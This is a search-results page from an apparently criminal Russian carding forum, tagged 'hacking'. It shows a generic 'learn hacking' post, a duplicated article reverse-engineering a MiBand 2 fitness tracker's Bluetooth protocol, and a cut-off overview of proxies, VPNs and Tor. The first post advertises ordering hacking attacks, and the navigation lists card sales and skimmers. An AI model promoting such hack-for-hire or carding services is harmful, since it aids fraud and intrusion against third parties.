Перейти к содержимому

Поиск по сайту

Результаты поиска по тегам 'взлом'.

  • Поиск по тегам

    Введите теги через запятую.
  • Поиск по автору

Тип публикаций


Категории и разделы

  • Garant-Service
    • Независимый гарант сервис
  • Торговый раздел
    • Схемы заработка
    • Продажа карт
    • Заливы на банковские карты
    • Бумажный рынок
    • Скиммеры
    • Прочие товары и услуги
  • Биржа труда
    • Ищу работу
    • Предлагаю работу
  • Форум
    • Новости
    • Анонимность
    • Юридический раздел
    • Библиотека кардера
    • Слив схем заработка
    • Ботнеты, кодинг, загрузки
    • Биллинги, веб дизайн
    • Платёжные системы
  • Offtopic
    • Курилка
    • Социальная инжинерия
    • Легальный бизнес
  • Новости и правила форума. Предложения и отзывы по работе.
    • Правила форума
    • Новости форума

Искать результаты в...

Искать результаты, которые...


Дата создания

  • Начать

    Конец


Последнее обновление

  • Начать

    Конец


Фильтр по количеству...

Зарегистрирован

  • Начать

    Конец


Группа


Сайт


Jabber


ICQ


Skype


Депозит

Найдено 15 результатов

  1. Как научиться взлому? Хакерство – это нахождение слабых мест в сети или в одном компьютере, чтобы получить к ним доступ. Стать хакером не так-то просто. Как научиться взлому? Чтобы научиться хакерству, понадобятся серьезные знания программных языков, способов взлома, поиска слабых мест, устройства операционных сетей и так далее. Очень нелишней будет творческий подход к деятельности. Вы должны уметь приспосабливаться под изменяющуюся ситуацию. Чтобы освоить хакерские приемы, нужно очень много: 1. Освоить и применять UNIX-систему, в частности, Ubuntu или MacOS. В самом начале такие системы были нужны для работников IT-сферы, а не для юзеров. Это системы, на каких стоит почти вся Всемирная Сеть. Не получится стать хакером, не разобравшись в них. 2. Выучить язык разметки HTML. Если Вы мало знакомы с программированием, можно начать с освоения Hyper Text Mark-Up Language. Неважно, что видно на сайте. На самом деле все это HTML. Это понадобится, чтобы отыскать слабые места ресурсов и применять эти уязвимости. 3. Освоить остальные языки программирования. С целью взломать чей-то код, следует понимать, как устроена система, как она работает. Некоторые языки мы рекомендуем для освоения. Это: · Python; · C++; · JavaScript, JQuery; · SQL. Python – оптимальный язык для разработки. C++ используется в промышленном программировании. SQL – это все пароли и личные данные. JavaScript, JQuery тоже очень популярен в использовании. 4. Кроме того, нужно изучить работу сетей, особенности их функционирования. Нужно понимать, как делаются сети, научиться настраивать ту сеть, которой пользуетесь Вы. 5. Нужно освоить криптографию, понимать алгоритмы разных шифров. Криптография сейчас задействуется почти везде: пароли, банковские карточки, торговые платформы, криптовалюты и т.д. 6. Изучить полезные программы для взлома. Узнать больше про взлом, хакинг можно на нашем форуме https://hackatm.net/. Здесь же можно заказать хакерскую атаку или взлом, если все перечисленное кажется неподъемным для освоения. Важное преимущество форума перед остальными заключается в том, что здесь каждое опубликованное объявление о специфических услугах и товарах проходит тщательную проверку у администрации. После того как проверка успешно пройдена, на форуме появляется соответствующая пометка. Это дополнительные гарантии безопасности для обеих сторон, взаимовыгодная сделка.
  2. В этой статье будет приведено пошаговое руководство взлома фитнес-трекера с поддержкой Bluetooth и низким энергопотреблением средствами ОС Linux. Эта история началась с моего поста в Facebook, посвященного проблеме отсутствия API для фитнес-трекеров, и почему сей факт мешает исследователям данных создавать что-то полезное и крутое для этих девайсов. Тот пост спровоцировал жаркую дискуссию и привлек внимание моего друга Володимира Шиманского, пытавшегося помочь мне с кодом Лео Соареса для моего фитнес-трекера MiBand 2. Володимир пытался запустить этот код, но были проблемы с соединением. Проблема была решена в течение нескольких часов, и код обновлен. Эта ситуация подтолкнула меня к активным действия. Используя вышеуказанный код, я смог подключиться к MiBand 2, поработать с уведомлениями и измерить ритм сердца. Однако этот функционал меня не устраивал. Я хотел получать данные с сенсоров в режиме реального времени и поэкспериментировать с полученной информацией. Мне хотелось создать советника по физическим упражнениям. В итоге было решено хакнуть фитнес-трекер. Приступаем. У меня не было никакого опыта работы с BLE-девайсами (Bluetooth Low Energy), и я решил начать с изучения этой технологии. Выяснилось, что никаких особых сложностей нет: У каждого BLE-устройства есть несколько служб. У каждой службы есть некоторые характеристики. У некоторых характеристик есть дескрипторы (если у характеристики больше чем один параметр или тип соответствует чтению или уведомлению). У некоторых характеристик есть доступ только на чтение/запись (например, текущее время, статус батареи или информация о последней ревизии). Некоторые характеристики более сложны и работают, используя запросы/цикл уведомлений (например, монитор частоты сердцебиения в режиме реального времени или авторизация). Вышеуказанного списка вполне достаточно для начала работы с фитнес-трекером. Также вам понадобятся два приложения для отладки BLE-устройства: анализаторпротоколов Wireshark и BLE отладчик. Кроме того, нужно активировать опции разработчика в устройстве на базе Android (для любителей iOS придется поискать эквивалент в этой платформе). Для начала нужно отключить MiBand2 от приложения телефона. Посмотрим, какие службы и характеристики есть у нашего устройства. Открываем отладчик для BLE и запускаем сканирование. Должно появиться примерно следующее: MAC адрес устройства нам понадобится позже, поэтому лучше эту информацию где-то сохранить или записать. Подключаемся и смотрим перечень служб и характеристик. Выполнив две простые операции, мы уже получили полезную информацию о нашем устройстве. Схожая функция доступна через командную строку при помощи утилит hcitool и gatttool. Запуск сканирования из командной строки: sudo hcitool lescan Подключение к BLE устройство через Mac адрес и получение списка служб и дескрипторов: sudo gatttool -b YOUR_MAC -I -t random > connect > primary > char-desc В некоторых случаях могут возникнуть проблемы. В том случае можно перезагрузить устройство или запустить следующую команду: ssudo hciconfig hci0 rese Подготовка к сниффингу данных Для сниффинга данных во время коммуникации телефона и BLE-устройства нужно включить Bluetooth-логи в настройках разработчика. Вначале необходимо включить настройки на Android-устройстве. Следуйте по шагам, описанным далее. До Android 4.1 опции разработчика доступны по умолчанию. Начиная с версии 4.2, нужно сделать следующее: 1. Откройте раздел Settings на Android-устройстве. 2. Выберите раздел System (только на устройствах с Android 8.0 и выше). 3. Прокрутите вниз и выберите About phone. 4. Прокрутите вниз и тапните 7 раз на Build number. 5. Возвратитесь к предыдущему разделу. Почти в самом низу должен появиться раздел Developer options. Откройте настройки разработчика и включите опцию «Enable Bleutooth HCI snoop log». Теперь все коммуникации между телефоном и любым внешним Bluetooth-устройством должны отражаться в файле btsnoop_hci.log. (на моем телефоне с Android 7.0 логи находятся в /mtklog/btlog/btsnoop_hci.log). Аутентификация Теперь нужно выполнить следующие шаги для получения информации о том, как работает аутентификация (сопряжение). 1. Включите Bluetooth и HCI логи. 2. Выполните сопряжение устройства с приложением Xiaomi Android App. 3. Отключите Bluetooth. 4. Загрузите btsnoop_hci.log на компьютер. 5. Откройте файл в Wireshark. 6. Найдите первый запрос, имеющий отношение к протоколу ATT, с параметром Handle: 0x0055 (который связан с компанией Anhui Huami Information Technology Co, выпускающей переносные устройства и владеющей брендом Xiaomi). Должно получиться примерно следующее: Выделенный запрос – первый этап аутентификации. Как видно из рисунка выше, обрабатываются следующие значения UUID: Pairing device Main service UUID 0000fee1-0000–1000–8000–00805f9b34fb Auth Characteristic (Char) UUID 00000009–0000–3512–2118–0009af100700 Notification descriptor (Des) handle 0x2902 (всегда неизменный) Аутентификация состоит из следующих шагов: Настройка auth-уведомлений (для получения ответа) посредством отправки двухбайтового запроса \x01\x00 в Des. Отправка 16-байтового ключа шифрования в Char с командой и добавление двух байт \x01\x00 + KEY. Запрос случайного ключа с устройства с командой посредством отправки двух байт \x02\x00 в Char. Получение случайного ключа от устройства (последние 16 байт). Шифрование этого случайного номера при помощи 16-байтового ключа, используя алгоритм шифрования AES/ECB/NoPadding (из Crypto.Cipher import AES) и обратная отправка в Char (\x03\x00 + закодированная информация). Данные в режиме реального времени Процесс аутентификации Auth оказался чуть сложнее, и появились некоторые проблемы. Мониторинг частоты сердцебиений отключался через 15 секунд. Ниже показан перечень полученных значений UUID: Hardware service (HRDW) UUID 0000fee0–0000–1000–8000–00805f9b34fb Heart Monitor Service (HMS) UUID 0000180d-0000–1000–8000–00805f9b34fb Heart Rate Measure Characteristic (HRM) UUID 00002a37–0000–1000–8000–00805f9b34fb Heart Monitor Control Characteristic (HMC) UUID 00002a39–0000–1000–8000–00805f9b34fb Sensor Characteristic (SENS) UUID 00000001–0000–3512–2118–0009af100700 Notification descriptor (DES) handle 0x2902 (всегда неизменный) Выполняются несколько стандартных операций: 1. Отключение текущего мониторинга сердцебиений. Отправка запроса \x15\x02\x00 к HMC для одноразовых измерений. Отправка запроса \x15\x01\x00 к HMC для непрерывных измерений.2. Разрешение сырых данных от гироскопа и измерителя сердцебиений посредством отправки команды \x01\x03\x19 к SENS Включение уведомлений для HRM посредством отправки запроса \x01\x00 к DES Начало непрерывных измерений сердцебиения посредством отправки запроса \x15\x01\x01 к HMC Отправка команды \x02 к SENS (не очень понятно, зачем нужна эта команда) Затем в процессе получения уведомлений каждый 12 секунд нам нужно отсылать пинг со значением \x16 к HCM Парсинг данных Далее нужно было разобраться, как распаковать информацию, приходящую с устройства, для последующего парсинга. Некоторую часть данных можно распарсить из логов, некоторую - нельзя. Поиск правильных пакетов и изучение системы кодирования может отнять некоторое время. В моем случае я попытался найти похожие байты в пакетах рядом с друг с другом. Некоторые байты повторяются внутри пакета. Raw heart: 02102d8c348c448c458c3d8c428c488c 16 Raw heart: 0218468c418c3d8c468c3f8c398c418c 16 Realtime heart: 93 Raw heart: 0220408c448c3f8c428c498c3c8c3d8c 16 Raw heart: 02283d8c398c488c3e8c468c488c328c 16 Realtime heart: 99 Raw heart: 0230438c408c378c3a8c318c458c388c 16 Realtime heart: 102 Raw heart: 02404f8c408c458c428c4d8c558c4d8c 16 Raw heart: 02483e8c3b8c3f8c348c398c318c428c 16 Realtime heart: 98 Raw heart: 02504c8c428c5e8c4f8c588c498c558c 16 Raw heart: 0258478c458c3c8c4e8c3f8c468c4d8c 16 Realtime heart: 100 Raw heart: 0260518c4d8c4f8c4b8c4f8c528c458c 16 Raw heart: 0268408c3f8c538c4d8c408c548c598c 16 Realtime heart: 102 Raw heart: 0278418c508c4e8c548c588c468c498c 16 Raw heart: 0280368c328c2e8c3c8c338c308c3f8c 16 Realtime heart: 101 Здесь можно заметить четкий повторяющийся шаблон 368c 328c 2e8c 3c8c 338c 308c 3f8c в пакете размером 16 байт. Если мы распакуем с учетом, что каждое измерение представляет собой беззнаковый короткий тип размером 2 байта, то получим 7 непосредственных измерений от сенсора сердца. Также видно, что второй байт просто увеличивается и связан, как я думаю, с временной разницей между измерениями (ответами). Raw gyro: 01de49ffd9ff3c004cffd8ff3b004dffdcff4400 Raw gyro: 01df4cffd6ff44004dffd8ff40004cffd1ff4700 Raw gyro: 02e1103231323d3274328e329632af32c732cf32 Raw gyro: 01e34fffd7ff56004bffc7ff590049ffccff4c00 Raw gyro: 01e443ffccff43004effcdff40005bffd4ff4c00 Raw gyro: 01e558ffc9ff5f005effbfff66005fffb0ff5900 Raw gyro: 01e64cffacff60005cffa7ff410066ffc9ff4600 Raw gyro: 01e760ffdcff4b0051ffe4ff4f0034ffdeff5300 Raw gyro: 02e903365c36813663361036543688374139fe3a Raw gyro: 01eb4bffc3ff50004fffc1ff430047ffbbff4100 Raw gyro: 01ec3effb2ff3c0050ffbfff560047ffccff7300 Raw gyro: 01ed4fffe0ff78005cffebff8e0056fff6ff8300 Raw gyro: 01ee7efffbffa1008bff0f00bc00b1ff1900b800 Raw gyro: 01ef9bff0c00d10095fff3ffd600b7ff0800df00 Raw gyro: 02f12445314600479e473348aa481c499749244a Raw gyro: 01f3c3ff1600fe00beff1800f200a6ff0800e700 Raw gyro: 01f4a9fff8ffd300a7fff3ffd700a9fff1ffdf00 Raw gyro: 01f5b1fff8ffe800b4fff1fff700acfffcffef00 Raw gyro: 01f67ffff7ffc0006bfff4ffb00078ffe9ffb600 Raw gyro: 01f786ffecffc0006ffff0ffbc0060fff1ffc000 Raw gyro: 02f9ca4cbb4c784c964ca84c784c854c444c1b4c Raw gyro: 01fb7cff0f00bb007eff2700ae0083ff30009800 Raw gyro: 01fc79ff1800b00076ff0f00bc0068ff0900d900 Raw gyro: 01fd78ff07000c01f6fffbff19011c000b00f600 Raw gyro: 01fe4b001100d30054000700c3004300efffeb00 Raw gyro: 01ff1f00d0ff1701fbffe8ff1b01e3ffffff1101 Raw gyro: 0201214b014bec4ad04aba4acb4abe4aba4abd4a Raw gyro: 0103efffecfffc00e3fff3fff300defff3fffc00 Raw gyro: 0104e3fff0fff400e6ffefff0301dbffe9ff0c01 Raw gyro: 0105e3fff0ff0301e6ffe6fffc00dcffecfffc00 Raw gyro: 0106dffff0fff700dbffeefff600d6fff0fff400 Raw gyro: 0107dfffecffff00e1fff0ff0301defff3fffc00 В случае с гироскопом ситуация оказалась чуть сложнее. Но я думаю, что упаковка должна выполняться схожим образом, как и для данных о частоте сердцебиения. Однако здесь у нас 3 измерения знакового типа для каждой оси гироскопа, а сам пакет размером 20 байт. Таким образом, данные от всех сенсоров укладываются не в 12, а в 3 измерения по осям x, y, z. Первые 2 байта играют ту же роль, что и в предыдущем случае. В итоге моя гипотеза оказалась верной. Код Код, как обычно, можно найти на Github с примером использования. Ничего сложного нет, и я решил подробно не рассматривать этот момент в статье. View full article
  3. В этой статье будет приведено пошаговое руководство взлома фитнес-трекера с поддержкой Bluetooth и низким энергопотреблением средствами ОС Linux. Эта история началась с моего поста в Facebook, посвященного проблеме отсутствия API для фитнес-трекеров, и почему сей факт мешает исследователям данных создавать что-то полезное и крутое для этих девайсов. Тот пост спровоцировал жаркую дискуссию и привлек внимание моего друга Володимира Шиманского, пытавшегося помочь мне с кодом Лео Соареса для моего фитнес-трекера MiBand 2. Володимир пытался запустить этот код, но были проблемы с соединением. Проблема была решена в течение нескольких часов, и код обновлен. Эта ситуация подтолкнула меня к активным действия. Используя вышеуказанный код, я смог подключиться к MiBand 2, поработать с уведомлениями и измерить ритм сердца. Однако этот функционал меня не устраивал. Я хотел получать данные с сенсоров в режиме реального времени и поэкспериментировать с полученной информацией. Мне хотелось создать советника по физическим упражнениям. В итоге было решено хакнуть фитнес-трекер. Приступаем. У меня не было никакого опыта работы с BLE-девайсами (Bluetooth Low Energy), и я решил начать с изучения этой технологии. Выяснилось, что никаких особых сложностей нет: У каждого BLE-устройства есть несколько служб. У каждой службы есть некоторые характеристики. У некоторых характеристик есть дескрипторы (если у характеристики больше чем один параметр или тип соответствует чтению или уведомлению). У некоторых характеристик есть доступ только на чтение/запись (например, текущее время, статус батареи или информация о последней ревизии). Некоторые характеристики более сложны и работают, используя запросы/цикл уведомлений (например, монитор частоты сердцебиения в режиме реального времени или авторизация). Вышеуказанного списка вполне достаточно для начала работы с фитнес-трекером. Также вам понадобятся два приложения для отладки BLE-устройства: анализаторпротоколов Wireshark и BLE отладчик. Кроме того, нужно активировать опции разработчика в устройстве на базе Android (для любителей iOS придется поискать эквивалент в этой платформе). Для начала нужно отключить MiBand2 от приложения телефона. Посмотрим, какие службы и характеристики есть у нашего устройства. Открываем отладчик для BLE и запускаем сканирование. Должно появиться примерно следующее: MAC адрес устройства нам понадобится позже, поэтому лучше эту информацию где-то сохранить или записать. Подключаемся и смотрим перечень служб и характеристик. Выполнив две простые операции, мы уже получили полезную информацию о нашем устройстве. Схожая функция доступна через командную строку при помощи утилит hcitool и gatttool. Запуск сканирования из командной строки: sudo hcitool lescan Подключение к BLE устройство через Mac адрес и получение списка служб и дескрипторов: sudo gatttool -b YOUR_MAC -I -t random > connect > primary > char-desc В некоторых случаях могут возникнуть проблемы. В том случае можно перезагрузить устройство или запустить следующую команду: ssudo hciconfig hci0 rese Подготовка к сниффингу данных Для сниффинга данных во время коммуникации телефона и BLE-устройства нужно включить Bluetooth-логи в настройках разработчика. Вначале необходимо включить настройки на Android-устройстве. Следуйте по шагам, описанным далее. До Android 4.1 опции разработчика доступны по умолчанию. Начиная с версии 4.2, нужно сделать следующее: 1. Откройте раздел Settings на Android-устройстве. 2. Выберите раздел System (только на устройствах с Android 8.0 и выше). 3. Прокрутите вниз и выберите About phone. 4. Прокрутите вниз и тапните 7 раз на Build number. 5. Возвратитесь к предыдущему разделу. Почти в самом низу должен появиться раздел Developer options. Откройте настройки разработчика и включите опцию «Enable Bleutooth HCI snoop log». Теперь все коммуникации между телефоном и любым внешним Bluetooth-устройством должны отражаться в файле btsnoop_hci.log. (на моем телефоне с Android 7.0 логи находятся в /mtklog/btlog/btsnoop_hci.log). Аутентификация Теперь нужно выполнить следующие шаги для получения информации о том, как работает аутентификация (сопряжение). 1. Включите Bluetooth и HCI логи. 2. Выполните сопряжение устройства с приложением Xiaomi Android App. 3. Отключите Bluetooth. 4. Загрузите btsnoop_hci.log на компьютер. 5. Откройте файл в Wireshark. 6. Найдите первый запрос, имеющий отношение к протоколу ATT, с параметром Handle: 0x0055 (который связан с компанией Anhui Huami Information Technology Co, выпускающей переносные устройства и владеющей брендом Xiaomi). Должно получиться примерно следующее: Выделенный запрос – первый этап аутентификации. Как видно из рисунка выше, обрабатываются следующие значения UUID: Pairing device Main service UUID 0000fee1-0000–1000–8000–00805f9b34fb Auth Characteristic (Char) UUID 00000009–0000–3512–2118–0009af100700 Notification descriptor (Des) handle 0x2902 (всегда неизменный) Аутентификация состоит из следующих шагов: Настройка auth-уведомлений (для получения ответа) посредством отправки двухбайтового запроса \x01\x00 в Des. Отправка 16-байтового ключа шифрования в Char с командой и добавление двух байт \x01\x00 + KEY. Запрос случайного ключа с устройства с командой посредством отправки двух байт \x02\x00 в Char. Получение случайного ключа от устройства (последние 16 байт). Шифрование этого случайного номера при помощи 16-байтового ключа, используя алгоритм шифрования AES/ECB/NoPadding (из Crypto.Cipher import AES) и обратная отправка в Char (\x03\x00 + закодированная информация). Данные в режиме реального времени Процесс аутентификации Auth оказался чуть сложнее, и появились некоторые проблемы. Мониторинг частоты сердцебиений отключался через 15 секунд. Ниже показан перечень полученных значений UUID: Hardware service (HRDW) UUID 0000fee0–0000–1000–8000–00805f9b34fb Heart Monitor Service (HMS) UUID 0000180d-0000–1000–8000–00805f9b34fb Heart Rate Measure Characteristic (HRM) UUID 00002a37–0000–1000–8000–00805f9b34fb Heart Monitor Control Characteristic (HMC) UUID 00002a39–0000–1000–8000–00805f9b34fb Sensor Characteristic (SENS) UUID 00000001–0000–3512–2118–0009af100700 Notification descriptor (DES) handle 0x2902 (всегда неизменный) Выполняются несколько стандартных операций: 1. Отключение текущего мониторинга сердцебиений. Отправка запроса \x15\x02\x00 к HMC для одноразовых измерений. Отправка запроса \x15\x01\x00 к HMC для непрерывных измерений.2. Разрешение сырых данных от гироскопа и измерителя сердцебиений посредством отправки команды \x01\x03\x19 к SENS Включение уведомлений для HRM посредством отправки запроса \x01\x00 к DES Начало непрерывных измерений сердцебиения посредством отправки запроса \x15\x01\x01 к HMC Отправка команды \x02 к SENS (не очень понятно, зачем нужна эта команда) Затем в процессе получения уведомлений каждый 12 секунд нам нужно отсылать пинг со значением \x16 к HCM Парсинг данных Далее нужно было разобраться, как распаковать информацию, приходящую с устройства, для последующего парсинга. Некоторую часть данных можно распарсить из логов, некоторую - нельзя. Поиск правильных пакетов и изучение системы кодирования может отнять некоторое время. В моем случае я попытался найти похожие байты в пакетах рядом с друг с другом. Некоторые байты повторяются внутри пакета. Raw heart: 02102d8c348c448c458c3d8c428c488c 16 Raw heart: 0218468c418c3d8c468c3f8c398c418c 16 Realtime heart: 93 Raw heart: 0220408c448c3f8c428c498c3c8c3d8c 16 Raw heart: 02283d8c398c488c3e8c468c488c328c 16 Realtime heart: 99 Raw heart: 0230438c408c378c3a8c318c458c388c 16 Realtime heart: 102 Raw heart: 02404f8c408c458c428c4d8c558c4d8c 16 Raw heart: 02483e8c3b8c3f8c348c398c318c428c 16 Realtime heart: 98 Raw heart: 02504c8c428c5e8c4f8c588c498c558c 16 Raw heart: 0258478c458c3c8c4e8c3f8c468c4d8c 16 Realtime heart: 100 Raw heart: 0260518c4d8c4f8c4b8c4f8c528c458c 16 Raw heart: 0268408c3f8c538c4d8c408c548c598c 16 Realtime heart: 102 Raw heart: 0278418c508c4e8c548c588c468c498c 16 Raw heart: 0280368c328c2e8c3c8c338c308c3f8c 16 Realtime heart: 101 Здесь можно заметить четкий повторяющийся шаблон 368c 328c 2e8c 3c8c 338c 308c 3f8c в пакете размером 16 байт. Если мы распакуем с учетом, что каждое измерение представляет собой беззнаковый короткий тип размером 2 байта, то получим 7 непосредственных измерений от сенсора сердца. Также видно, что второй байт просто увеличивается и связан, как я думаю, с временной разницей между измерениями (ответами). Raw gyro: 01de49ffd9ff3c004cffd8ff3b004dffdcff4400 Raw gyro: 01df4cffd6ff44004dffd8ff40004cffd1ff4700 Raw gyro: 02e1103231323d3274328e329632af32c732cf32 Raw gyro: 01e34fffd7ff56004bffc7ff590049ffccff4c00 Raw gyro: 01e443ffccff43004effcdff40005bffd4ff4c00 Raw gyro: 01e558ffc9ff5f005effbfff66005fffb0ff5900 Raw gyro: 01e64cffacff60005cffa7ff410066ffc9ff4600 Raw gyro: 01e760ffdcff4b0051ffe4ff4f0034ffdeff5300 Raw gyro: 02e903365c36813663361036543688374139fe3a Raw gyro: 01eb4bffc3ff50004fffc1ff430047ffbbff4100 Raw gyro: 01ec3effb2ff3c0050ffbfff560047ffccff7300 Raw gyro: 01ed4fffe0ff78005cffebff8e0056fff6ff8300 Raw gyro: 01ee7efffbffa1008bff0f00bc00b1ff1900b800 Raw gyro: 01ef9bff0c00d10095fff3ffd600b7ff0800df00 Raw gyro: 02f12445314600479e473348aa481c499749244a Raw gyro: 01f3c3ff1600fe00beff1800f200a6ff0800e700 Raw gyro: 01f4a9fff8ffd300a7fff3ffd700a9fff1ffdf00 Raw gyro: 01f5b1fff8ffe800b4fff1fff700acfffcffef00 Raw gyro: 01f67ffff7ffc0006bfff4ffb00078ffe9ffb600 Raw gyro: 01f786ffecffc0006ffff0ffbc0060fff1ffc000 Raw gyro: 02f9ca4cbb4c784c964ca84c784c854c444c1b4c Raw gyro: 01fb7cff0f00bb007eff2700ae0083ff30009800 Raw gyro: 01fc79ff1800b00076ff0f00bc0068ff0900d900 Raw gyro: 01fd78ff07000c01f6fffbff19011c000b00f600 Raw gyro: 01fe4b001100d30054000700c3004300efffeb00 Raw gyro: 01ff1f00d0ff1701fbffe8ff1b01e3ffffff1101 Raw gyro: 0201214b014bec4ad04aba4acb4abe4aba4abd4a Raw gyro: 0103efffecfffc00e3fff3fff300defff3fffc00 Raw gyro: 0104e3fff0fff400e6ffefff0301dbffe9ff0c01 Raw gyro: 0105e3fff0ff0301e6ffe6fffc00dcffecfffc00 Raw gyro: 0106dffff0fff700dbffeefff600d6fff0fff400 Raw gyro: 0107dfffecffff00e1fff0ff0301defff3fffc00 В случае с гироскопом ситуация оказалась чуть сложнее. Но я думаю, что упаковка должна выполняться схожим образом, как и для данных о частоте сердцебиения. Однако здесь у нас 3 измерения знакового типа для каждой оси гироскопа, а сам пакет размером 20 байт. Таким образом, данные от всех сенсоров укладываются не в 12, а в 3 измерения по осям x, y, z. Первые 2 байта играют ту же роль, что и в предыдущем случае. В итоге моя гипотеза оказалась верной. Код Код, как обычно, можно найти на Github с примером использования. Ничего сложного нет, и я решил подробно не рассматривать этот момент в статье.
  4. Неважно, по каким причинам ты решил шифровать то, что пересылаешь через интернет. Это может быть забота о секретности личных данных, попытка обойти запреты того или иного государства или другие мотивы. В современном мире простым людям доступен неплохой выбор криптостойких шифрованных протоколов и программ, которые их реализуют. В этой статье мы пройдемся по всем классам таких решений (пусть многие из них и широко известны), обсудим надежность и посмотрим, какие доступны реализации. Прокси-серверы Прокси-серверы — самый доступный способ анонимизировать трафик: они дешевы и широко распространены. Их принцип работы очень прост: прокси — это почтальон, который доставляет конверты с письмами вместо тебя, аккуратно стирая имя отправителя, и возвращает ответ лично тебе в руки. Изначально эта технология была призвана защищать внутренние корпоративные сети от остального интернета (сотрудники получали доступ из внутренней сети в интернет через шлюз), но стала исторически первым способом анонимизировать трафик. Работая через прокси, компьютер все свои запросы перенаправляет через посредника (прокси-сервер), и уже посредник, представляясь твоим компьютером, запрашивает данные у сайтов. Прокси-серверы узкоспециализированы, поэтому на каждый тип интернет-соединения имеется свой тип прокси. Например, для FTP (File Transfer Protocol) есть FTP-прокси. Подробно мы разберем три типа прокси-серверов. HTTP и HTTPS могут работать только с запросами HTTP, а вся разница между ними в том, что HTTPS шифрует передаваемые данные, а HTTP — нет. Поэтому прокси HTTP не рекомендуются к пользованию, они могут лишь менять адрес IP, а данные защитить они неспособны. Также будь осторожен с выбором самого прокси-сервера, так как некоторые не только не защитят твои данные, но и могут раскрыть личность. INFO Обращай внимание на тип сервера — transparent proxy или anonymous proxy. Первые не будут скрывать твою личность! Использовать такой прокси несложно: найди в интернете или создай сервер, которому сможешь доверять, и, открыв настройки браузера (доступ к сети), введи данные. Тип SOCKS применяется в тех приложениях, которые либо не используют HTTP и HTTPS, либо не имеют встроенной поддержки прокси-серверов. В отличие от предыдущего типа, этот априори не будет публиковать твой IP, поэтому об анонимности можно не беспокоиться. Однако SOCKS сам по себе не предоставляет никакого шифрования, это лишь транспортный протокол. Чтобы применять его, есть, например, утилита Shadowsocks. SOCKS4 и SOCKS5 — это разные версии серверов. Убедительно рекомендую использовать пятую версию, так как она имеет много возможностей и более безопасна. Например, поддерживает использование логина и пароля, запросы DNS. А лучше даже использовать Shadowsocks — это SOCKS5 на стероидах. Тут есть и мощное шифрование, и скрытие трафика, и возможность обходить различные блокировки. Есть клиенты как для компьютера, так и для смартфона, позволяющие оставаться под защитой постоянно. Чтобы начать использовать SOCKS в привычных программах, не нужно ничего особенного. В Firefox и µTorrent эта функция встроена и доступна в настройках. Для Google Chrome есть расширение Proxy Helper. Можно воспользоваться универсальными программами вроде SocksCap или ProxyCap. Список множества бесплатных HTTP, HTTPS и SOCKS прокси-серверов можно найти либо с помощью поиска, либо в Википедии. VPN VPN (Virtual Private Network — виртуальная частная сеть) также изначально не задумывалась как средство защиты и анонимизации трафика. Ее задачей было объединить компьютеры в единую сеть, даже если они находятся за множество километров друг от друга. Ключевой особенностью стало то, что соединения VPN всегда защищались шифрованием, так как использовались в корпорациях и позволяли подключать несколько филиалов к головному офису. VPN имеет два режима: объединение двух локальных сетей между собой через интернет и подключение отдельного компьютера к удаленной локальной сети (удаленный доступ). Последний и послужил основой для некоммерческого, персонального варианта. Защита данных в соединении VPN предоставляется двумя техниками, которые зачастую используются вместе: PPP (Point-to-Point Protocol) используется для защиты на уровне канала данных, то есть на самом низком из возможных. Его задача — обеспечить стабильное соединение между двумя точками в интернете, а также предоставить шифрование и аутентификацию. PPTP (Point-to-Point Tunneling Protocol) является расширением и дополнением PPP. Для работы этого протокола устанавливается два соединения — основное и управляющее. Из-за того что придуман этот протокол был в далеком 1999 году, его безопасность оставляет желать лучшего. Ни один из методов шифрования, работающих с PPTP, не устойчив. Часть из них подвержена расшифровке даже в автоматическом режиме. Потому я не советую использовать PPTP. Этот протокол имеет серьезные уязвимости как в аутентификации, так и в шифровании и позволяет злоумышленнику очень быстро вскрыть канал и получить доступ к данным. Более новый способ создания соединения — еще один протокол, построенный поверх PPP, — L2TP (Layer 2 Tunneling Protocol). Цель этого протокола — не столько защитить соединение, сколько полностью регламентировать процесс сообщения компьютеров в сети. Данный протокол, кроме создания соединений VPN, также используется, например, для подключения банкоматов к офисам банков, что служит некоторой гарантией. Хотя и стоит учесть, что собственного шифрования у L2TP нет. L2TP не защищает сами данные, передаваемые в его рамках. Для этого обычно используется протокол IPsec (IP security). Он призван защищать содержимое пакетов IP и благодаря этому может шифровать любые виды соединений. Для VPN из двух возможных режимов используется лишь туннельный, защищающий не только данные передаваемого пакета в сети, но и его заголовки. Благодаря этому со стороны не будет видно, кто отправитель данных. IKE и IKEv2 (Internet Key Exchange) — строгие алгоритмы шифрования и защиты данных, передаваемых по информационному каналу. Используется исключительно с IPsec, так как является его защитным слоем — именно благодаря IKE данные в соединении остаются под замком. В общем-то, эти алгоритмы и послужили основой для развития всех современных средств и утилит создания соединений VPN, но настало время поговорить о том, что и из чего выбирать. С распространением SSL и TLS протокол PPP был расширен до SSTP (Secure Socket Tunneling Protocol) и в таком виде работает не через открытое соединение, а по SSL. Это гарантирует надежное шифрование и защиту от потери пакетов. Но стоит учитывать, что SSTP был разработан в Microsoft, а Microsoft сотрудничает с правительствами, поэтому доверять SSTP можно только с учетом этого. OpenVPN — самое популярное решение для создания защищенного соединения. Этот протокол открыт и предоставляет самую серьезную защиту, поэтому ему можно доверять. Настройка соединения вряд ли займет больше пары минут. SoftEther — мультиклиент для работы как с описанными выше протоколами, включая OpenVPN, так и со своим собственным, не менее безопасным, чем OpenVPN. В таблице ниже — небольшое резюме по этим решениям. Tor Tor (The Onion Router) — одно из лучших средств для обеспечения анонимности в Сети. Схема работы подразумевает трехкратную защиту данных и анонимизацию трафика. Как описано в самом названии, Tor использует так называемую луковую маршрутизацию: твои данные — это сердцевина лука, а их защита — слои вокруг. Так, каждый из промежуточных серверов Tor снимает свой слой защиты, и только третий, последний из них, достает сердцевину и отправляет запрос в интернет. Работу всей системы обеспечивают тысячи энтузиастов по всему миру, борющиеся за права человека и приватность. Благодаря этому для каждого отдельного сайта строится собственная цепочка промежуточных серверов Tor, что дает полную защиту: каждый сайт — новая личность. Большой плюс Tor — стабильность работы и большая забота об анонимности: благодаря усердиям многих специалистов он работает даже в Китае, стране, которая широко известна своим строжайшим подходом к блокировкам и наказаниями за их обход. Для упрощения жизни пользователям разработчики создали Tor Browser, основанный на Firefox, и улучшили его дополнениями, запрещающими сайтам следить за тобой. Например, HTTPS Everywhere заставляет веб-сайты использовать шифрование, а NoScript отключает выполнение скриптов на странице, фактически запрещая собирать любые данные пользователя. Скачать Tor, как и прилагающийся к нему браузер, можно на официальном сайте проекта Tor Project. DPI К сожалению, все эти средства могут оказаться бесполезными, если твой провайдер начал блокировки с применением DPI (Deep Packet Inspection) — системы глубокого анализа сетевого трафика. Цель DPI — отбрасывать все, что не похоже на работу обычного человека за 